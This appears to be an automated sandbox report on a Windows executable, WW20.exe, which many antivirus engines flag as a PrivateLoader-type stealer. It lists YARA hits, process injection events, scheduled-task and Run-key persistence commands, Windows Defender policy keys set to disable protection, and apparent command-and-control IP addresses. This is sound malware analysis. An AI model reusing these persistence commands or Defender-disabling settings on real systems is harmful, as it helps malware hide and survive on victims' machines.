url	http://crl.geotrust.com/crls/gtglobal.crl04
url	https://accounts.google.com/ServiceLogin
url	https://accounts.google.com/OAuthLogin
url	https://c.android.clients.google.com/
url	https://search.goo.ne.jp/sgt.jsp?MT=
url	https://www.google.com/tools/feedback/chrome/__submit
url	https://chrome.google.com/webstore/category/collection/dark_themes
url	http://check.googlezip.net/generate_204
url	http://ocsp.starfieldtech.com/08
url	http://www.guernseypost.com/postcode_finder/
url	http://crl.certum.pl/ca.crl0h
url	http://ator
url	https://suggest.yandex.by/suggest-ff.cgi?part=
url	http://feed.snap.do/?q=
url	https://sp.uk.ask.com/sh/i/a16/favicon/favicon.ico
url	http://www.language
url	https://support.google.com/chrome/
url	http://developer.chrome.com/apps/declare_permissions.html
url	http://www.google.com/chrome/intl/ko/eula_text.html
url	https://www.globalsign.com/repository/03
url	http://www.startssl.com/sfsca.crl0
url	http://UA-Compatible
url	https://se.search.yahoo.com/search?ei=
url	http://EVSecure-ocsp.geotrust.com0

Yara rule detected in process memory (50 out of 1406 events)

description	Create a windows service	rule	Create_Service
description	Communication using DGA	rule	Network_DGA
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Take ScreenShot	rule	ScreenShot
description	Communications use DNS	rule	Network_DNS
description	Perform crypto currency mining	rule	BitCoin
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Win.Trojan.agentTesla	rule	Win_Trojan_agentTesla_Zero
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Steal credential	rule	local_credential_Steal
description	Virtual currency	rule	Virtual_currency_Zero
description	Run a KeyLogger	rule	KeyLogger
description	Google Chrome User Data Check	rule	Chrome_User_Data_Check_Zero
description	browser info stealer	rule	infoStealer_browser_Zero
description	Communications over P2P network	rule	Network_P2P_Win
description	File Downloader	rule	Network_Downloader
description	Escalate priviledges	rule	Escalate_priviledges
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Possibly employs anti-virtualization techniques	rule	vmdetect
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Install itself for autorun at Windows startup	rule	Persistence
description	Communications over FTP	rule	Network_FTP
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Create a windows service	rule	Create_Service
description	Communication using DGA	rule	Network_DGA
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Take ScreenShot	rule	ScreenShot
description	Communications use DNS	rule	Network_DNS
description	Perform crypto currency mining	rule	BitCoin
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Win.Trojan.agentTesla	rule	Win_Trojan_agentTesla_Zero
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP

Terminates another process (2 events)

Time & API	Arguments	Status	Return	Repeated
NtTerminateProcess Dec. 19, 2022, 9:37 a.m.	status_code: 0xc0000005 process_identifier: 2748 process_handle: 0x0000000000000094		0	0
NtTerminateProcess Dec. 19, 2022, 9:37 a.m.	status_code: 0xc0000005 process_identifier: 2748 process_handle: 0x0000000000000094	1	0	0

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	schtasks /create /f /RU "test22" /tr ""C:\Program Files (x86)\ClipManagerP0\ClipManager_Svc.exe"" /tn "LOLPA4DESK LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr ""C:\Program Files (x86)\ClipManagerP0\ClipManager_Svc.exe"" /tn "LOLPA4DESK HR" /sc HOURLY /rl HIGHEST

Communicates with host for which no DNS query was performed (3 events)

host	107.182.129.251
host	163.123.143.4
host	45.10.52.33

Installs itself for autorun at Windows startup (3 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\LOLPA4DESK	reg_value	"C:\Program Files (x86)\ClipManagerP0\ClipManager_Svc.exe"
cmdline	schtasks /create /f /RU "test22" /tr ""C:\Program Files (x86)\ClipManagerP0\ClipManager_Svc.exe"" /tn "LOLPA4DESK LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr ""C:\Program Files (x86)\ClipManagerP0\ClipManager_Svc.exe"" /tn "LOLPA4DESK HR" /sc HOURLY /rl HIGHEST

One or more non-whitelisted processes were created (3 events)

parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1232,2183132983874014909,2190702872535226655,131072 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=Microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=3CBBC489ADEFFE45636BBD207231B280 --mojo-platform-channel-handle=1244 --ignored=" --type=renderer " /prefetch:2
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2752 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef441f1e8,0x7fef441f1f8,0x7fef441f208

Found URLs in memory pointing to an IP address rather than a domain (potentially indicative of Command & Control traffic) (1 event)

url	http://127.0.0.1

Resumed a suspended thread in a remote process potentially indicative of process injection (38 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2792 resumed a thread in remote process 2748
NtResumeThread Dec. 19, 2022, 9:36 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2748	1	0	0
NtResumeThread Dec. 19, 2022, 9:36 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2748	1	0	0
NtResumeThread Dec. 19, 2022, 9:36 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2748	1	0	0
NtResumeThread Dec. 19, 2022, 9:36 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2748	1	0	0
NtResumeThread Dec. 19, 2022, 9:36 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2748	1	0	0
NtResumeThread Dec. 19, 2022, 9:36 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2748	1	0	0
NtResumeThread Dec. 19, 2022, 9:36 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2748	1	0	0
NtResumeThread Dec. 19, 2022, 9:36 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2748	1	0	0
NtResumeThread Dec. 19, 2022, 9:36 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2748	1	0	0
NtResumeThread Dec. 19, 2022, 9:36 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2748	1	0	0
NtResumeThread Dec. 19, 2022, 9:36 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2748	1	0	0
NtResumeThread Dec. 19, 2022, 9:36 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2748	1	0	0
NtResumeThread Dec. 19, 2022, 9:36 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2748	1	0	0
NtResumeThread Dec. 19, 2022, 9:36 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2748	1	0	0
NtResumeThread Dec. 19, 2022, 9:36 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2748	1	0	0
NtResumeThread Dec. 19, 2022, 9:36 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2748	1	0	0
NtResumeThread Dec. 19, 2022, 9:36 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2748	1	0	0
NtResumeThread Dec. 19, 2022, 9:36 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2748	1	0	0
NtResumeThread Dec. 19, 2022, 9:36 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2748	1	0	0
NtResumeThread Dec. 19, 2022, 9:36 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2748	1	0	0
NtResumeThread Dec. 19, 2022, 9:36 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2748	1	0	0
NtResumeThread Dec. 19, 2022, 9:36 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2748	1	0	0
NtResumeThread Dec. 19, 2022, 9:36 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2748	1	0	0
NtResumeThread Dec. 19, 2022, 9:36 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2748	1	0	0
NtResumeThread Dec. 19, 2022, 9:36 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2748	1	0	0
NtResumeThread Dec. 19, 2022, 9:36 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2748	1	0	0
NtResumeThread Dec. 19, 2022, 9:36 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2748	1	0	0
NtResumeThread Dec. 19, 2022, 9:36 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2748	1	0	0
NtResumeThread Dec. 19, 2022, 9:36 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2748	1	0	0
NtResumeThread Dec. 19, 2022, 9:36 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2748	1	0	0
NtResumeThread Dec. 19, 2022, 9:36 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2748	1	0	0
NtResumeThread Dec. 19, 2022, 9:36 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2748	1	0	0
NtResumeThread Dec. 19, 2022, 9:36 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2748	1	0	0
NtResumeThread Dec. 19, 2022, 9:36 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2748	1	0	0
NtResumeThread Dec. 19, 2022, 9:36 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2748	1	0	0
NtResumeThread Dec. 19, 2022, 9:36 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2748	1	0	0
NtResumeThread Dec. 19, 2022, 9:36 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2748	1	0	0

Uses Sysinternals tools in order to add additional command line functionality (2 events)

cmdline	schtasks /create /f /RU "test22" /tr ""C:\Program Files (x86)\ClipManagerP0\ClipManager_Svc.exe"" /tn "LOLPA4DESK LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr ""C:\Program Files (x86)\ClipManagerP0\ClipManager_Svc.exe"" /tn "LOLPA4DESK HR" /sc HOURLY /rl HIGHEST

Disables Windows Security features (10 events)

description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{8ACAAA32-87E2-4EE0-A51D-B02C050E3C1E}Machine\Software\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{8ACAAA32-87E2-4EE0-A51D-B02C050E3C1E}Machine\Software\Policies\Microsoft\Windows Defender\Exclusions\Extensions\exe
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{8ACAAA32-87E2-4EE0-A51D-B02C050E3C1E}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{8ACAAA32-87E2-4EE0-A51D-B02C050E3C1E}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{8ACAAA32-87E2-4EE0-A51D-B02C050E3C1E}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{8ACAAA32-87E2-4EE0-A51D-B02C050E3C1E}Machine\Software\Policies\Microsoft\Windows Defender\DisableRoutinelyTakingAction
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{8ACAAA32-87E2-4EE0-A51D-B02C050E3C1E}Machine\Software\Policies\Microsoft\Windows Defender\Exclusions\Exclusions_Extensions
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{8ACAAA32-87E2-4EE0-A51D-B02C050E3C1E}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{8ACAAA32-87E2-4EE0-A51D-B02C050E3C1E}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{8ACAAA32-87E2-4EE0-A51D-B02C050E3C1E}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification

File has been identified by 32 AntiVirus engines on VirusTotal as malicious (32 events)

Bkav	W32.AIDetect.malware2
MicroWorld-eScan	Gen:Heur.Mint.PrivateLoader.1
McAfee	Artemis!5DEBAE710ACC
Cylance	Unsafe
VIPRE	Gen:Heur.Mint.PrivateLoader.1
Arcabit	Trojan.Mint.PrivateLoader.1
Symantec	ML.Attribute.HighConfidence
Elastic	malicious (high confidence)
ESET-NOD32	a variant of Win32/Agent.ADGH
APEX	Malicious
Cynet	Malicious (score: 100)
Kaspersky	UDS:DangerousObject.Multi.Generic
BitDefender	Gen:Heur.Mint.PrivateLoader.1
Avast	Win32:PWSX-gen [Trj]
Ad-Aware	Gen:Heur.Mint.PrivateLoader.1
Emsisoft	Gen:Heur.Mint.PrivateLoader.1 (B)
McAfee-GW-Edition	BehavesLike.Win32.BadFile.vh
FireEye	Gen:Heur.Mint.PrivateLoader.1
Avira	TR/AD.Nekark.mexad
MAX	malware (ai score=84)
Microsoft	Trojan:Win32/Sabsik.FL.B!ml
GData	Gen:Heur.Mint.PrivateLoader.1
AhnLab-V3	Trojan/Win.Generic.C5272956
BitDefenderTheta	Gen:NN.ZexaF.36106.tw0@aW6jdQaQ
ALYac	Gen:Heur.Mint.PrivateLoader.1
VBA32	BScope.TrojanPSW.Arkei
Malwarebytes	Trojan.WDDisabler
Rising	Downloader.Agent!1.D93C (CLASSIC)
SentinelOne	Static AI - Suspicious PE
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	W32/Agent.ADGH!tr
AVG	Win32:PWSX-gen [Trj]

WW20.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All